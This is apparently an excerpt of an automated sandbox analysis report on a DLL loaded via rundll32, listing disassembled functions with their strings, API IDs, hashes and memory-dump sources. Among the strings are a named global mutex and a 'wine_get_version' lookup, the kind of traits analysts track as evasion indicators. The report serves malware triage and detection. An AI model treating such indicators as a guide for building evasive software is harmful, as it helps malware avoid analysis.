                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID: WmiBrightnessControl.cpp
                                                                    • API String ID: 1323251999-137989277
                                                                    • Opcode ID: 5683d2e524f9351041a721a0c04e413ec95e80fa3b52c9a7dfb8d9ba8b9472aa
                                                                    • Instruction ID: 59dab586b458b14b0f2ce7ea2e02025b3aa5b3b124d06b04fa505e2eb1f10eea
                                                                    • Opcode Fuzzy Hash: 5683d2e524f9351041a721a0c04e413ec95e80fa3b52c9a7dfb8d9ba8b9472aa
                                                                    • Instruction Fuzzy Hash: 2331D033B06641A6DE28CE15C404579A361F790BD0F18223BDA6E077D8DF39E849C754
                                                                    Function 00007FF8A8D1F2C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Ios_base_dtorstd::ios_base::_
                                                                    • String ID: 0
                                                                    • API String ID: 323602529-4108050209
                                                                    • Opcode ID: 2e7e9fc904eb75d695e215548ad9ebea77f15dcf7aa71a62d1169850791a812e
                                                                    • Instruction ID: ff69dbf708054a5cfc6922ceebba59023b696c4f5593840bf1547deca0ee32d1
                                                                    • Opcode Fuzzy Hash: 2e7e9fc904eb75d695e215548ad9ebea77f15dcf7aa71a62d1169850791a812e
                                                                    • Instruction Fuzzy Hash: 2E31AF3261AB40EAD710DF20E4402ED37B4FB48798F500236EA9D43BA4DF38E559C754
                                                                    Function 00007FF8A8D027FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::runtime_error::runtime_errorthrow_exception
                                                                    • String ID: Day of month is not valid for year
                                                                    • API String ID: 3828811160-1521898139
                                                                    • Opcode ID: 84d2daf90518049316943645cf0e5bb3eec30a983e3c40179046461e36576ec1
                                                                    • Instruction ID: 8848fb2f8753feeb02ae70f4dbc91e674624bdffaf5675173746985d19518baf
                                                                    • Opcode Fuzzy Hash: 84d2daf90518049316943645cf0e5bb3eec30a983e3c40179046461e36576ec1
                                                                    • Instruction Fuzzy Hash: 7C214636F0A60291FB21CB25D8409792264FF947E0F510236EA7E87BE4CF3CD8459368
                                                                    Function 00007FF8A8DE5BA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _set_errno_from_matherr
                                                                    • String ID: exp
                                                                    • API String ID: 1187470696-113136155
                                                                    • Opcode ID: 02aa0f55b1a8874f43537a2706ad28b239fe5dfa3cfbce0507dbe8f83b3ef5ac
                                                                    • Instruction ID: 5007168f7be4468094ca66281c3d0acc186bb2555817500e866a44e314becb3a
                                                                    • Opcode Fuzzy Hash: 02aa0f55b1a8874f43537a2706ad28b239fe5dfa3cfbce0507dbe8f83b3ef5ac
                                                                    • Instruction Fuzzy Hash: 56211D36A1A646DBE760DF28A45126A73B1FB88780F500635F69D83B55EF3CE8448F24
                                                                    Function 00007FF8A8D06E24 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52synchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDeallocateMutexstd::_
                                                                    • String ID: Global\${C40CFCD4-C757-4139-A4DA-7CB51A8DBF80}
                                                                    • API String ID: 2784379168-266908802
                                                                    • Opcode ID: 02ab40d601c47c4bd6e5fdae253d9982c0720896644d64d585b2e25be54e70d6
                                                                    • Instruction ID: 58e6c98e87f995ae6924f15ee1e9e06f04915079cbea616824998ea348ebcd7b
                                                                    • Opcode Fuzzy Hash: 02ab40d601c47c4bd6e5fdae253d9982c0720896644d64d585b2e25be54e70d6
                                                                    • Instruction Fuzzy Hash: D421BB3261AA42A0EB20DB25E8411AA7371EB887F4F801332E6BD476E5DF3DD255C714
                                                                    Function 00007FF8A8D10794 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FF8A8D10814
                                                                      • Part of subcall function 00007FF8A8D14824: _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8D1485D
                                                                      • Part of subcall function 00007FF8A8D04D08: WaitForSingleObjectEx.KERNEL32 ref: 00007FF8A8D04D62
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentExceptionObjectSingleThreadThrowWait
                                                                    • String ID: boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                    • API String ID: 928027368-3352860666
                                                                    • Opcode ID: 994a6202a9c3685202e8c49310c65bffd27d361856865c6016e354541c512811
                                                                    • Instruction ID: cb8fb9279891191ec732c0f045c194d1bc74383aac1ef9c89752aa5d48b309cc
                                                                    • Opcode Fuzzy Hash: 994a6202a9c3685202e8c49310c65bffd27d361856865c6016e354541c512811
                                                                    • Instruction Fuzzy Hash: D721813190A6C2A1EB10EB24D4447A877A1FF44BE8F548235DA6D473C5CF3CE859C7A4
                                                                    Function 00007FF8A8D02274 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocate__std_exception_copystd::_
                                                                    • String ID: Weekday is out of range 0..6
                                                                    • API String ID: 3694657363-1292618072
                                                                    • Opcode ID: 5712023aab23666bcc4aa939f3a77f028e085d8234eb82f5ada7f38f23bd60ce
                                                                    • Instruction ID: 1fa02ba8802aecf8bf45e5373eb1fce21a9c6f1c91723e8209e3464d4210106f
                                                                    • Opcode Fuzzy Hash: 5712023aab23666bcc4aa939f3a77f028e085d8234eb82f5ada7f38f23bd60ce
                                                                    • Instruction Fuzzy Hash: 00214832B15A01E8FB009BA4E8503AC37B4FB087A8F940135DA6D97AA9DF78D594C324
                                                                    Function 00007FF8A8D0234C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocate__std_exception_copystd::_
                                                                    • String ID: Day of year value is out of range 1..366
                                                                    • API String ID: 3694657363-4072519960
                                                                    • Opcode ID: ab36d1336ac458bd2dea0bf6fadc49879dfd2f429f3452fa44419b5642cab8d2
                                                                    • Instruction ID: c7d45364c008a7dcdfe7e1a6a81ba19e878dffbcd5c763f871ddfd0fafbceabe
                                                                    • Opcode Fuzzy Hash: ab36d1336ac458bd2dea0bf6fadc49879dfd2f429f3452fa44419b5642cab8d2
                                                                    • Instruction Fuzzy Hash: 33214532B15A01E8FB00DBA4E8903AC37B4FB08798F940535DA6D97AA9DF38D595C324
                                                                    Function 00007FF8A8D02550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocate__std_exception_copystd::_
                                                                    • String ID: Year is out of valid range: 1400..10000
                                                                    • API String ID: 3694657363-2344417016
                                                                    • Opcode ID: 072e68aaa3e467892ea3da7818a1ab6e2fd58acdb12903a67d2c210c5a44a482
                                                                    • Instruction ID: 1e7d54d055b9494f967a342ade83acc3e8fb7ec2809ec644e70f44daa4357f31
                                                                    • Opcode Fuzzy Hash: 072e68aaa3e467892ea3da7818a1ab6e2fd58acdb12903a67d2c210c5a44a482
                                                                    • Instruction Fuzzy Hash: CE214832B15A01E8FB009BA4E8903AC37B4FB08798F940535DA6D97BA9DF78D595C324
                                                                    Function 00007FF8A8D02724 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocate__std_exception_copystd::_
                                                                    • String ID: Month number is out of range 1..12
                                                                    • API String ID: 3694657363-4198407886
                                                                    • Opcode ID: 2a1ac6ef3aeba2bd9865e4ebf9b20a26fcd048e8fe28fa3fbc9b1659af5c6910
                                                                    • Instruction ID: 6fdc583e64f45f033f1030b6396b0e9de39c58d71bbbf2b933ce9917ed845462
                                                                    • Opcode Fuzzy Hash: 2a1ac6ef3aeba2bd9865e4ebf9b20a26fcd048e8fe28fa3fbc9b1659af5c6910
                                                                    • Instruction Fuzzy Hash: 0D214A32B15A01E8FB009B64E8503AC37B4FB48798F940135DA6D97AA9DF38D594C324
                                                                    Function 00007FF8A8D95290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: wine_get_version
                                                                    • API String ID: 1646373207-2902792109
                                                                    • Opcode ID: 64f094e310f04052f5700c1f6bd54cdd92774b9cc2459a96bcb2dc19004332e9
                                                                    • Instruction ID: 864d9c6e0f7313f4bf53ce34e79e95e8e8401c290b2df5594d49a643210c102b
                                                                    • Opcode Fuzzy Hash: 64f094e310f04052f5700c1f6bd54cdd92774b9cc2459a96bcb2dc19004332e9
                                                                    • Instruction Fuzzy Hash: AB119E30E0AAC2E6FA52D720B8513B533A0EF9D785F800135D89D42662EF3CE565CB28
                                                                    Function 00007FF8A8DBC590 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastMove
                                                                    • String ID: boost::filesystem::rename
                                                                    • API String ID: 55378915-2110873845
                                                                    • Opcode ID: 8dca8874bfb7dd6f7dfd873a9110266fd1d7c776757e538c1c404bb48a2eebbb
                                                                    • Instruction ID: 666ff8fd9bedd6f40849bf0711d38cc05da6dfbaed770cf99e5a5e08a48dc7f1
                                                                    • Opcode Fuzzy Hash: 8dca8874bfb7dd6f7dfd873a9110266fd1d7c776757e538c1c404bb48a2eebbb
                                                                    • Instruction Fuzzy Hash: 80F02231B0DB82D5EB008B12F84802A67A0FB55FC4F204035DE9D93B54DF3CE6A58368
                                                                    Function 00007FF8A8CFAC80 Relevance: 5.1, APIs: 4, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$FreeLocal
                                                                    • String ID:
                                                                    • API String ID: 1627422176-0
                                                                    • Opcode ID: 0992fd39bbcecca185d899d48b70f7d57ffc834e00189db1b119eed07bf66011
                                                                    • Instruction ID: 9feadd7d2c80a50860be92826fe10d62ddf27b4a1d8a0aaf037cf40d2db3ad28
                                                                    • Opcode Fuzzy Hash: 0992fd39bbcecca185d899d48b70f7d57ffc834e00189db1b119eed07bf66011
                                                                    • Instruction Fuzzy Hash: E911B120F0E782AAFBD8AB22A45007A9291EF45FC5F540035ED5E477D2DF7CEC108A28
                                                                    Function 00007FF8A8DB9310 Relevance: 5.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
